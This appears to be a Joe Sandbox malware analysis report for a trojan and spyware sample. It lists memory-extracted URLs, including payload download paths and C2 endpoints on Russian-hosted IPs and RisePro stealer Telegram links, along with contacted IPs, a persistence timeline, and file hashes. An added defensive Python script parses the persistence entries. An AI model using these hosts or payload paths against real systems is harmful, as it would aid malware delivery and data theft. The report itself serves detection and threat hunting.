http://passport.net/tb | svchost.exe, 0000001E.00000002.3325518723.000001EFCECA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3276271710.000001EFCDC85000.00000004.00000020.00020000.00000000.sdmp | false
https://t.me/RiseProSUPPORT | 2531414c80.exe, 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.000000000169D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000018.00000002.2404856512.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.000000000146E000.00000004.00000020.00020000.00000000.sdmp | false
http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue | svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp | false
https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf | svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp | false
http://193.233.132.139/sev56rkm/index.phpcoded | explorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmp | false
https://www.ecosia.org/newtab/ | 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmp | false
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmp | false
http://147.45.47.102:57893/hera/amadka.exea | MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp | false
                                                                                                                                                  https://www.youtube.com/accountb3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2492388851.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2446883487.0000000003E8F000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2447086415.0000000003EBD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    https://db-ip.com/eRageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      http://193.233.132.139/sev56rkm/index.phpbEexplorta.exe, 00000002.00000002.3253602072.0000000001539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        http://193.233.132.139/sev56rkm/index.php1mb3JtLXVybGVuY29kZWQ=explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          https://ipinfo.io/RageMP131.exe, 0000001F.00000002.2450136740.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            http://193.233.132.139/age.Streams.DataWriterexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              https://www.maxmind.com/en/locate-my-ip-address2531414c80.exefalse
                                                                                                                                                                https://www.youtube.com/accountJ_b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://193.233.132.167/cost/random.exeexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000001E.00000002.3308028724.000001EFCDCE1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLMPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exesvchost.exe, 00000006.00000002.3273860235.000002AF25D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3343648641.000002AF2AD0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3326650125.000002AF2AC8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3254546774.000002AF25441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 0000001E.00000003.2703702572.000001EFCE578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2500832032.000001EFCE57A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://ipinfo.io/widget/demo/89.187.171.132v2531414c80.exe, 00000008.00000002.2511321549.000000000150F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://193.233.132.167/cost/go.exeAK2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://193.233.132.167/cost/sarra.exeexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://t.me/risepro_botriseproURageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesuesvchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://193.233.132.167/mine/random.exeexplorta.exe, 00000002.00000002.3253602072.00000000014DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://schemas.misvchost.exe, 0000001E.00000003.2702970756.000001EFCE55A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://ipinfo.io:443/widget/demo/89.187.171.132S2531414c80.exe, 00000008.00000002.2511321549.0000000001529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://pcss.dllsvchost.exe, 0000001E.00000002.3290683644.000001EFCDC9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://t.me/risepro_botHMPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustcesvchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://193.233.132.139/sev56rkm/index.php001explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000001E.00000003.2354605983.000001EFCE510000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfLsvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          http://147.45.47.102:57893/hera/amadka.exe2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://ipinfo.io/widget/demo/89.187.171.132yBRageMP131.exe, 0000001F.00000002.2450136740.00000000014AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2355581057.000001EFCE54D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://db-ip.com/2MPGPH131.exe, 00000013.00000002.2500776200.0000000001730000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://147.45.47.102:57893/hera/amadka.exeHK2531414c80.exe, 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001E.00000002.3324323127.000001EFCE537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3324393598.000001EFCE55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://193.233.132.139/sev56rkm/index.phpWindowsexplorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001E.00000003.2355633243.000001EFCE53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356061920.000001EFCE540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2356241086.000001EFCE563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3271307179.000001EFCDC5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80600esvchost.exe, 0000001E.00000002.3269339148.000001EFCDC45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  http://Passport.NET/STSsvchost.exe, 0000001E.00000003.2923000049.000001EFCE589000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2501990171.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2469731618.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2452907046.000001EFCE56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905634199.000001EFCE581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.2905520461.000001EFCE57F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionIDsvchost.exe, 0000001E.00000002.3360389667.000001EFCEE0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3325172143.000001EFCEC53000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://193.233.132.167/cost/go.exe.1MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                        193.233.132.139
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        2895FREE-NET-ASFREEnetEUtrue
                                                                                                                                                                                                                                        34.117.186.192
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                        142.250.105.84
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        64.233.176.95
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        52.182.143.212
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                        193.233.132.234
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                        147.45.47.93
                                                                                                                                                                                                                                        unknownRussian Federation
                                                                                                                                                                                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                                                                                                                                                                                        142.251.15.94
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        172.217.215.94
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        142.250.9.94
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                        104.21.67.211
                                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
IP               Domain   Country             ASN      ASN Name                               Malicious
77.221.151.47    unknown  Russian Federation  30968    INFOBOX-ASInfoboxruAutonomousSystemRU  false
40.126.28.22     unknown  United States       8075     MICROSOFT-CORP-MSN-AS-BLOCKUS          false
172.217.215.95   unknown  United States       15169    GOOGLEUS                               false
1.1.1.1          unknown  Australia           13335    CLOUDFLARENETUS                        false
142.250.9.138    unknown  United States       15169    GOOGLEUS                               false
172.67.75.166    unknown  United States       13335    CLOUDFLARENETUS                        false
20.42.65.92      unknown  United States       8075     MICROSOFT-CORP-MSN-AS-BLOCKUS          false
172.253.124.113  unknown  United States       15169    GOOGLEUS                               false
193.233.132.167  unknown  Russian Federation  2895     FREE-NET-ASFREEnetEU                   true
172.253.124.136  unknown  United States       15169    GOOGLEUS                               false
142.250.105.147  unknown  United States       15169    GOOGLEUS                               false
64.233.185.102   unknown  United States       15169    GOOGLEUS                               false
185.93.1.243     unknown  Czech Republic      60068    CDN77GB                                false
185.172.128.19   unknown  Russian Federation  50916    NADYMSS-ASRU                           false
239.255.255.250  unknown  Reserved            unknown  unknown                                false
23.221.242.90    unknown  United States       8612     TISCALI-IT                             false
64.233.176.101   unknown  United States       15169    GOOGLEUS                               false
                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                        192.168.2.6
                                                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                                        Analysis ID:1430545
                                                                                                                                                                                                                                        Start date and time:2024-04-23 21:33:09 +02:00
                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                        Overall analysis duration:0h 13m 36s
                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:62
                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@134/170@0/32
                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                        • Successful, ratio: 60%
                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
• Execution Graph export aborted for target explorta.exe, PID 1088 because there are no executed functions
                                                                                                                                                                                                                                        • Execution Graph export aborted for target file.exe, PID 3200 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                        • Skipping network analysis since amount of network traffic is too extensive
                                                                                                                                                                                                                                        • VT rate limit hit for: file.exe
Time      Type             Description
21:34:00  Task Scheduler   Run new task: explorta path: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe
21:34:01  API Interceptor  222995x Sleep call for process: explorta.exe modified
21:34:07  API Interceptor  2x Sleep call for process: svchost.exe modified
21:34:07  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
21:34:16  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
21:34:17  Task Scheduler   Run new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
21:34:17  Task Scheduler   Run new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
21:34:24  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
21:34:34  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe
21:34:41  Task Scheduler   Run new task: chrosha path: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
21:34:42  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2531414c80.exe C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
21:34:47  API Interceptor  4x Sleep call for process: WerFault.exe modified
21:34:51  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
21:35:02  API Interceptor  762x Sleep call for process: chrosha.exe modified
21:35:07  API Interceptor  6x Sleep call for process: RegAsm.exe modified
21:35:17  Task Scheduler   Run new task: NewB.exe path: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe
21:35:42  Autostart        Run: C:\Users\user\AppData\Local\Temp\1000150001\\2wERSk6O2SB7CCv97O9Iw4c8.bat
21:36:00  Autostart        Run: C:\Users\user\AppData\Local\Temp\1000150001\\bJeGGRCnLC1DFc4D1K1Hs3V4.bat
21:36:12  Autostart        Run: C:\Users\user\AppData\Local\Temp\1000150001\\Fzbnqj3QsKBst6EJon5cSKf7.bat
21:36:23  Autostart        Run: C:\Users\user\AppData\Local\Temp\1000150001\\NewB.exe
21:36:27  Task Scheduler   Run new task: Opera scheduled assistant Autoupdate 1713900985 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --productiscomponent --bypasslauncher --installdir="C:\Users\user\AppData\Local\Programs\Opera\assistant" --producttype=assistant $(Arg0)
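The timeline above records the sample's persistence in two forms: Run values under HKCU (Joe Sandbox shows the 64-bit registry view as HKCU64) and scheduled tasks, nearly all pointing into %LOCALAPPDATA%\Temp, %LOCALAPPDATA%\<vendor-looking folder> or C:\ProgramData. The script below is an added example, not code from the Joe Sandbox report: it parses timeline rows in the flattened form they appear in here, extracts each Run-key or task artifact, and flags those whose image lives in a user-writable drop folder, the same idea as the "New RUN Key Pointing to Suspicious Folder" signature. The regular expressions, the folder list and the AppData\Local allow-list are this example's own assumptions, and the sample rows are copied from the table above.

```python
"""Triage the persistence rows of a Joe Sandbox timeline.

Added example, not part of the Joe Sandbox report. The regular expressions
and the "suspicious folder" heuristic below are this example's assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: rows copied from the report's timeline as they appear
# when the table is flattened (time, type and description run together).
SAMPLE_ROWS = [
    r"21:34:00Task SchedulerRun new task: explorta path: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe",
    r"21:34:01API Interceptor222995x Sleep call for process: explorta.exe modified",
    r"21:34:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exe C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exe",
    r"21:34:17Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe",
    r"21:34:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe",
    r"21:35:42AutostartRun: C:\Users\user\AppData\Local\Temp\1000150001\\2wERSk6O2SB7CCv97O9Iw4c8.bat",
    r'21:36:27Task SchedulerRun new task: Opera scheduled assistant Autoupdate 1713900985 path: C:\Users\user\AppData\Local\Programs\Opera\autoupdate\opera_autoupdate.exe s>--scheduledtask --productiscomponent --bypasslauncher --installdir="C:\Users\user\AppData\Local\Programs\Opera\assistant" --producttype=assistant $(Arg0)',
]

ROW_RE = re.compile(r"^(\d{2}:\d{2}:\d{2})(Task Scheduler|Autostart|API Interceptor)(.*)$")
TASK_RE = re.compile(r"^Run new task: (.+?) path: (.+)$")
# "Run: <key> <value name> <path>", or just "Run: <path>" for the .bat entries.
# HKCU64 (64-bit view) is accepted by the same pattern as HKCU.
RUNKEY_RE = re.compile(r"^Run: (?:(HK[A-Z0-9]+\\\S+) (\S+) )?([A-Za-z]:\\.+)$")

# Assumed heuristic: user-writable drop locations that legitimate installers
# rarely register for autostart.
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\programdata\\",
    "\\users\\public\\",
    "\\appdata\\roaming\\",
    "\\windows\\temp\\",
)
# Assumed allow-list: normal homes for per-user software under AppData\Local.
LOCAL_ALLOW = ("\\appdata\\local\\programs\\", "\\appdata\\local\\microsoft\\")


@dataclass
class Artifact:
    time: str
    mechanism: str        # "Task Scheduler" or "Run key"
    name: Optional[str]   # task name or Run value name; None for a bare path
    key: Optional[str]    # registry key for Run-key entries, else None
    path: str             # image path
    args: str             # task arguments, "" when none
    suspicious: bool


def is_suspicious_path(path: str) -> bool:
    """True when the image sits in a drop folder rather than an install dir."""
    p = path.lower()
    if any(d in p for d in SUSPICIOUS_DIRS):
        return True
    # A made-up vendor folder directly under AppData\Local is flagged unless
    # it is one of the allow-listed per-user install locations.
    return "\\appdata\\local\\" in p and not any(a in p for a in LOCAL_ALLOW)


def parse_row(row: str) -> Optional[Artifact]:
    """One timeline row -> Artifact, or None for rows without persistence."""
    m = ROW_RE.match(row)
    if not m:
        return None
    time, kind, desc = m.groups()
    if kind == "Task Scheduler":
        t = TASK_RE.match(desc)
        if not t:
            return None
        name, target = t.groups()
        # Joe Sandbox separates the task image from its arguments with " s>".
        path, _, args = target.partition(" s>")
        return Artifact(time, "Task Scheduler", name, None, path, args, is_suspicious_path(path))
    if kind == "Autostart":
        r = RUNKEY_RE.match(desc)
        if not r:
            return None
        key, name, path = r.groups()
        return Artifact(time, "Run key", name, key, path, "", is_suspicious_path(path))
    return None  # API Interceptor rows carry no persistence information


def parse_persistence(rows: List[str]) -> List[Artifact]:
    """Every Run-key and scheduled-task artifact in the rows, in order."""
    return [a for a in map(parse_row, rows) if a is not None]


def hunt_list(rows: List[str]) -> List[str]:
    """Distinct suspicious image paths worth sweeping for on other hosts."""
    return sorted({a.path for a in parse_persistence(rows) if a.suspicious})


if __name__ == "__main__":
    for a in parse_persistence(SAMPLE_ROWS):
        flag = "SUSPICIOUS" if a.suspicious else "ok"
        print(f"{a.time}  {a.mechanism:<14}  {flag:<10}  {a.name or '-'}  ->  {a.path}")
    print("\nSweep for:", *hunt_list(SAMPLE_ROWS), sep="\n  ")
```

Run against the seven sample rows it reports six artifacts (the API Interceptor row is skipped) and flags five of them; the Opera autoupdate task is left unflagged only because its image sits under AppData\Local\Programs, which this example's allow-list treats as a normal install location, so that entry still deserves a manual look given that Opera is not part of the analysis system image.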
No context
Process: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2397184
Entropy (8bit): 7.929142981070319
Encrypted: false
SSDEEP: 49152:Kg69SebPPiKgYy9bOxGNLL9zDNgvELoEewJTJo4759x:Kg69SebiLbhZL92vlEewlJo47v
MD5: A5E341D76C1BE40293C678679CA9A729
SHA1: D8687917F5B9B3C5D9F51996CE2F5A1CC4A539B2
SHA-256: 90652AABBE1B148E1F7FCF58914E0654097B3542638890F23CB61B194411E1BE
